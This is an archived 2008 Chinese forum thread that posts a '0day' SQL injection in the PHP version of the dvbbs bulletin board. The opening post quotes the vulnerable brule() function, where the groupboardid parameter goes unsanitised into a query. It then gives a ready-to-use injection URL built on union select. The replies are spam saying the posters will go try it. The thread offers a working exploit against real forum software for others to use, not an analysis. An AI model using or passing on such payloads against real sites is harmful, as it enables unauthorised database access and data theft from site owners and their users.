315技术社区's Archiver

咨询客服QQ:604164

政政 发表于 2008-3-13 17:24

dvbbs之PHP版本0day

[code]function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
[/code]

直接获得变量groupboardid,不为空就直接带入查询导致注入。

[code]http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
[/code]

hfpp 发表于 2008-4-1 21:08

顶顶顶好帖子,我现在就去刷

顶顶顶好帖子,我现在就去刷顶顶顶好帖子,我现在就去刷

hfpp 发表于 2008-4-1 21:08

好,的的我现在就去看看

好,的的我现在就去看看

binggugu21 发表于 2008-11-12 22:05

不容怀疑的数学

*** 作者被禁止或删除 内容自动屏蔽 ***

页: [1]
咨询客服QQ:604164

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.